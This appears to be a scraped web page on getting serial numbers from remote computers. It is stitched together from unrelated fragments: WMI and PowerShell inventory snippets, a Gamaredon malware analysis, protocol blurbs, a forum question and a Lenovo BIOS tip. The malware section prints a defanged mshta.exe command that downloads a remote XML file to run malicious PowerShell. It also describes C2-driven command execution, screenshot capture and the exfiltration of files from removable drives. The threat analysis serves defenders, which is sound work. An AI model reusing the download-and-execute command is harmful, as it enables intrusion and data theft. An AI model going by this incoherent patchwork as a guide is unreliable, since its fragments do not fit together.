
Vbscript Get Serial Number From Remote Computer



The script examples shown in this topic obtain data only from the local computer. For more information about how to use the script to obtain data from remote computers, see Connecting to WMI on a Remote Computer.








The Get-ComputerInfo - Query Computer Info From Local/Remote Computers - (WMI) PowerShell sample on TechNet Gallery uses a number of calls to hardware and software to display information about a local or remote system.


PS C:\Users\itv128> Get-WmiObject win32_bios -computername dnbtd084
Get-WmiObject : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Get-WmiObject win32_bios -computername dnbtd084
+
    + CategoryInfo : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


Use this simple script against a CSV file to pull serial numbers on remote computers. The script assumes the user has the appropriate level of access on the remote computers in order to query WMI remotely.


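# Import-Csv yields one object per row, keyed by the file's header line.
# If the host name sits in a named column, pass that property instead, e.g.
# $computerobject.ComputerName (an assumed column name; the page does not give the CSV layout).
$Computerobjects = Import-CSV c:\temp\importdatalist.csv
ForEach ($computerobject in $computerobjects) {
    write-host $Computerobject
    Get-WmiObject win32_diskdrive -ComputerName $computerobject
}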


Get-ComputerInfo was introduced in PowerShell 5 and provides similar information about your system. You can also read from the registry selected operating system information such as version, build information, release ids, and UBR number.


Once opened, the LNKs will attempt to execute MSHTA.EXE to download and parse a remote XML file to execute a malicious PowerShell script:

mshta.exe hxxp://a0704093.xsph[.]ru/bass/grudge.xml /f

Gamaredon is known to use the domain xsph[.]ru. The servers in this campaign only allow access from IP addresses inside the Ukrainian address space.

This PowerShell script decodes and executes a second PowerShell script (instrumentor), which collects data from the victim and reports back to a remote server. This script also allows the remote server to send a PowerShell command or binary blob containing encrypted VBScript (VBS) code to be executed locally:


The instrumentor PowerShell script usually consists of a function that decodes the encrypted response from the command and control (C2) server and executes it as a VBScript object. The key used in the XOR decoder is calculated based on the machine's volume serial number plus index parameters passed in the response blob. This method makes it difficult to decode the malicious content if an observer looking at the data doesn't have both parameters available.

The PowerShell script also repeatedly captures the current user's screen. This code uses the "System.Windows.Forms" object to capture a copy of the virtual desktop, including setups with multiple screens. The screen capture is executed nine times, but the resulting screenshot is always saved to "%TEMP%\test.png", which gets overwritten every time. The resulting image (PNG file) is then converted to a base64-encoded string, stored in a variable and the screenshot image file is removed from the disk.

The script then proceeds to upload the victim's information to the remote server. The following information is then collected and exfiltrated to a hardcoded C2 URL.


Upon sending the system information, the server response is parsed to see if there are commands to be executed. The entire script runs up to four times, thus up to four different commands can be executed each time.

The code checks if the first character is an exclamation point ("!"). If so, the remainder of the response is expected to be a PowerShell code that is passed directly to the command IEX. The output of that command is then added to the variable "cmd" and sent back to the C2 server.

If the response starts with any other character, it is treated as an encrypted blob and passed to the decoder function, along with the volume serial number to be decoded and executed as VBScript.


This script uses the same Get-IP() function to get a random IP assigned to the domain and queries a URL constructed from the IP address and a hardcoded extended resource. Just like the previous script, the computer name and volume serial number are used again in communications with the C2 server. The C2 server uses them to encode the next-stage payload subsequently served to the script.

If the response from the C2 starts with the string "http", the content is treated as the URL to download the final payload binary. The Volume Serial Number and Computer Name are passed to this URL and the response is decoded using the XorBytes function.


The decrypted binary is then saved to the "%TEMP%" folder with a name consisting of a random string of numbers and the ".exe" file extension and is executed.

Alternatively, if the response from the C2 does not begin with the "http" string, the content is treated as a VBS and executed via a COM object.


Avoiding these folders is likely an attempt by the malware to avoid exfiltrating system files thereby focussing on user files of interest only.

For each file exfiltrated to the C2, the implant calculates the MD5 hash for the following information and stores it in the "%LocalAppData%\profiles_c.ini" file:

The implant also steals files from removable drives connected to the infected endpoint. When the implant finds a removable drive, it looks for files with the file extensions listed earlier. Once a file is found, the implant creates a randomly named folder in the %TEMP% directory and copies the original file from its original location to:

%Temp%\\connect\\

For example, a user file found in a remote drive "E:" at path "E:\top_secret_docs\isengard.doc" will be copied to

"%temp%\randomly_named_folder\connect\\top_secret_docs\isengard.doc"

The contents of the folder in the temp directory are subsequently exfiltrated to the C2.


The Telnet protocol is mostly used by network admins to access and manage network devices remotely. It helps them access the device by telnetting to the IP address or hostname of a remote device. It allows users to access any application on a remote computer. This helps them to establish a connection to a remote system.


It helps you to log in to another computer over a network and allows you to execute commands on a remote machine. You can move files from one machine to another. The SSH protocol encrypts traffic in both directions, which helps you to prevent trafficking, sniffing, and password theft.


A serialized product, as installed from a deployment package, is uniquely identified by a licensing identifier (LEID). Use the LEID to identify the installed products whose serial numbers you want to query or change. The list of LEIDs is available here.


I have a specific situation. I want to get the MAC address from a remote computer, which is not in a domain. I know the hostname and IP address of the remote computer. The IP address of my computer is 192.168.2.40 and the remote computer IP is 192.168.2.41.


The serial number and hostname of the victim's computer are some of the first pieces of information the VBA collects. They are converted to hexadecimal and included in the reverse shell HTTP request to identify both the implant and the victim. Figure 10 shows off the configuration of the URI request within the macro and Figure 11 represents an example URI.


Dynamic DNS enables adversaries to rapidly provision very large numbers of records that map back to their infrastructure, creating a confusion layer between victims and adversaries. Gamaredon Group exclusively used Dynamic DNS locations for remotely hosted templates, rotating domains consistently, and leveraging separate infrastructure for hosting stagers and templates.


Spearphishing attachments that utilize template injection may bypass security controls because they contain no embedded VBA code. The attached document retrieves a remotely hosted template where the malicious VBA code resides. In order to detect this activity dynamically, analyze DNS and network traffic over common protocols (HTTP/HTTPS/SMB) and processes generated by Microsoft Office applications. Enterprise defenders may need to whitelist any legitimate use of remotely hosted templates, or any benign network activity to Microsoft infrastructure. Below is an example EQL query focused on new process creation events from Office products that also made DNS requests outside our whitelist.


Just a small addition: Lenovo is a bit tricky with their BIOS information, so the Model field only shows the alphanumeric model number (something like 20F9003SUK). To see the full product name you need to gather either the SystemFamily value from ComputerSystem or the Version value from ComputerSystemProduct (which for the model number I mentioned before is ThinkPad T460s).

